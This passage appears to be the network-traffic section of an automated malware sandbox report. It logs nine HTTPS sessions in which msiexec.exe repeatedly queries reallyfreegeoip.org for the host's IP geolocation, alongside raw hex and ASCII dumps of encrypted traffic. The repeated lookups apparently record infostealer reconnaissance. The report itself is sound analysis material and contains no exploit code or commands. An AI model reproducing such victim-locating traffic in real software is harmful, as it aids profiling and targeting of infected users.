                                        Data Ascii: u+<Q6ZUWM8VDb%~:r-o?uA{,xys4?TP&__Yn]O=x#0Ip_3%L1c_%Hh`=5A{tJ+(U?QP[1RF::ZO|{
                                        2024-10-08 01:32:37 UTC1390INData Raw: 5f b7 ea 16 e6 a3 d9 94 e7 f4 e2 ba 29 3d c3 4e bd ab 7b 2d b2 c5 4d 77 38 a5 56 68 7b 0f c6 6e f1 58 7a 2e c5 de 6c fa 04 62 26 31 11 2e 83 f4 34 60 8c 98 e8 ad e5 4c 48 c7 af 9e 0b 7d 76 2f 2e 4f 40 09 55 78 5a 29 e1 19 0a 8f 6f 9c 24 7a 9d a0 a8 d5 b3 b2 44 b6 4e 0e bd bf c9 5f 9f 2f 40 c5 7f a6 92 9d ea 21 1e f4 4d ee 4d 55 1d b7 e0 2d c8 89 55 8a 5c af 9b 1a 54 08 42 a1 3a ae fb 0d b4 67 ff be 10 19 0e 04 b6 54 91 d5 15 b8 4a 42 ce 47 f1 1b 05 d4 c5 c2 cf 20 eb d4 c9 4d 21 31 49 98 f4 45 54 f4 16 ad 09 38 a4 57 fc fe e3 f6 40 c0 ba 01 4a 7e e1 6c 87 bc 68 e5 78 1b 44 b0 47 c6 e2 e3 bb ba d5 83 89 1c e9 33 79 c0 c8 e9 80 57 74 ef 6a 04 ea e6 ac fc 84 9e e3 e3 c5 71 57 29 19 33 11 83 46 5d 05 29 93 53 8f 45 9a 33 14 78 84 32 17 81 4f 81 a6 bd 1a 6f 84
                                        Data Ascii: _)=N{-Mw8Vh{nXz.lb&1.4`LH}v/.O@UxZ)o$zDN_/@!MMU-U\TB:gTJBG M!1IET8W@J~lhxDG3yWtjqW)3F])SE3x2Oo
                                        2024-10-08 01:32:37 UTC1390INData Raw: dd 7b d6 8b 1d db af 97 d4 57 8c 74 42 b3 d0 45 43 b2 eb c0 1d 2f 74 fe 9d e9 74 c2 f0 8c 54 b1 4c b5 15 c0 09 33 ec 3d 77 da eb 74 cc 40 67 05 df cb 22 9c 4c 47 d9 8e 40 f1 09 cd 20 cd 84 17 b3 0b bd 59 bb bf ec 50 6d c0 fd d9 7f 18 3e e0 be 2b 4a 7d 99 cd 60 e1 89 49 2a be 8f 6a e2 c8 5d ef 4c dd 76 6e d5 cf 5a da cf c5 71 3d 70 68 ea 64 fe dd 93 59 d6 47 25 d5 85 ac ba 7f f8 63 36 ad 20 aa cb ea d6 c4 c6 cb 1d 86 4f c6 e9 61 bf 5e 7d 4f 3a 8d e0 56 67 4c a5 98 2c 84 f2 bf 19 0d 9f 5b 74 30 ad b6 51 cf e2 c8 ee fe b0 43 32 b8 35 82 9b 29 3c 3b 8e 09 58 f3 aa ff c7 2c 80 9e f6 6d 43 e1 39 f9 1a f2 70 5f 85 dc 01 12 86 9c 43 c3 d1 a0 50 4a dc f7 92 c5 c2 f7 84 b8 05 22 f8 e1 9d a0 28 96 55 5e 25 50 0a 19 4d 00 f7 7b fe ef d3 13 00 e8 cc cb c7 d1 e1 0f e6
                                        Data Ascii: {WtBEC/ttTL3=wt@g"LG@ YPm>+J}`I*j]LvnZq=phdYG%c6 Oa^}O:VgL,[t0QC25)<;X,mC9p_CPJ"(U^%PM{


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.549880188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-08 01:32:40 UTC676INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:40 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17492
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPLtooHRNSw0D9VVnTmX9Ux%2FpIZDaq2fJgd4DAAdxmXQ%2Bnm1Lcp07OiQRIVdpz5pwpVeOgOMMuWisDvD4Yaa8FPnpk4eEfkyjO0guuOcgR9ZyOx6W8mqFjkkgid8lnBkJq%2FTYhBb"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf260e3dee37c7c-EWR
                                        2024-10-08 01:32:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.549886188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:41 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-10-08 01:32:41 UTC678INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:41 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17493
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qZzBSwRfxNv6QKD38pD8mEL46eKY2BtVIMt6%2FSiBoC4N0wi4HZss5B585WWEorcoJghogO%2Bnm%2FbxsDx6BsEeETk6sDvji28cUHz%2FKDohdz7QUlEVtxgtO9NHjbdysrIe2ReynZev"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf260e8fc04de99-EWR
                                        2024-10-08 01:32:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.549903188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:43 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-08 01:32:44 UTC678INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:43 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17495
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9t51VWMV%2BBKK8vFp2OtlfhzQQtmPU5lOqK7mj%2FkAB1gV7KG4IXgX4igbZQvcprBWdgJtbuPjS9O9PLl3Qrijz%2Fjw1iOIrv7MoawFICT77tindbvRK8RL0MK0l%2FafBPFTo6uDZB4n"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf260f6ae6d8c36-EWR
                                        2024-10-08 01:32:44 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.549912188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:45 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-08 01:32:45 UTC678INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:45 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17497
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G91NCnwR750QFQ89OJh4N2vCTOgrAL29sr%2FBSw%2Bl6cqiHnzwQsjSUTS2ptO1tc4W6gqKaGTOM0Ff%2FITqRVI8RIIqLaEs9cYOl5gEIqc80FNI0dMy86C%2FVwZBLQgpyWA1b592sl1u"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf260fe6977c354-EWR
                                        2024-10-08 01:32:45 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.549922188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:46 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-10-08 01:32:46 UTC680INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:46 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17498
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hvDUOxUmyiUFGjXqwVbXndmsq4%2FntQ3Oi8jDdZ%2B1R%2FcVqi6pozNiIpq%2FsCOy9G18mmQGVj9ISCU7hgPSUqG50P9xB1rqqp2kpWUuNpzeljI00Xs3ilwZmWSQK%2BZUApMRI59e0CNs"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf26105ba410c82-EWR
                                        2024-10-08 01:32:46 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.549932188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:47 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        2024-10-08 01:32:47 UTC672INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:47 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17499
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwFDkWNXQEmBvA2KNXad5%2BM0B39eGVcaCYGqxpFJh6aIxBbQkataM1XoxcL6SA7yILPownwOZuJ38fZVzDDrI2byDthDPNsqqMwcahonwu54N22snqr8apnJSEdfIinRfbb5W6nA"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf2610d2c09c46b-EWR
                                        2024-10-08 01:32:47 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.549941188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:48 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-08 01:32:48 UTC678INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:48 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17500
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FkX3FuR%2B2hV3DHnR4l92bhKzjKN7Bjn6wahT4AiAUpaKTTxlwObgpXyKPkF52oEhdmY6iqGL%2F1P51BeeFig9bIX2WOW20XlGRuNflZDIxiG2hctVT9Lnmwxubzz1oo%2FbnBzm7Ih"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf26114aaa08cd7-EWR
                                        2024-10-08 01:32:48 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.549951188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:49 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-08 01:32:50 UTC680INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:49 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17501
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjKSvrnEwUPw8vq4nWt44uaEOSu12Ws%2F0Xphs9J2FctIbTCEIoXfzvJAq2EoMIhy%2BWHuRuT%2BJprtAx4WcWVadNfp5%2FqmxHDj%2FCxHdViXkmAR6K6lNlNwwRepVyzhcg44HbywySCz"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf2611c3fb20f90-EWR
                                        2024-10-08 01:32:50 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.549961188.114.96.34432364C:\Windows\SysWOW64\msiexec.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-08 01:32:51 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                        Host: reallyfreegeoip.org
                                        Connection: Keep-Alive
                                        2024-10-08 01:32:51 UTC682INHTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 01:32:51 GMT
                                        Content-Type: application/xml
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        access-control-allow-origin: *
                                        vary: Accept-Encoding
                                        Cache-Control: max-age=86400
                                        CF-Cache-Status: HIT
                                        Age: 17503
                                        Last-Modified: Mon, 07 Oct 2024 20:41:08 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gyaa0S%2BpC2JIYhkLjsvU3O3e%2BWY5JLMtLWBGW6I8f6ZWYnJKlPTKN%2FFsC2hT5kpaQeF%2BVfaEYtmfAqpUnyS69MyvKxRoufWqT%2FKaHQL9GJeaTPPVlsw0v%2BAFlgoZxOFZgYra8NJu"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8cf26125ab0d0c90-EWR
                                        2024-10-08 01:32:51 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                        Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                        2024-10-08 01:32:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


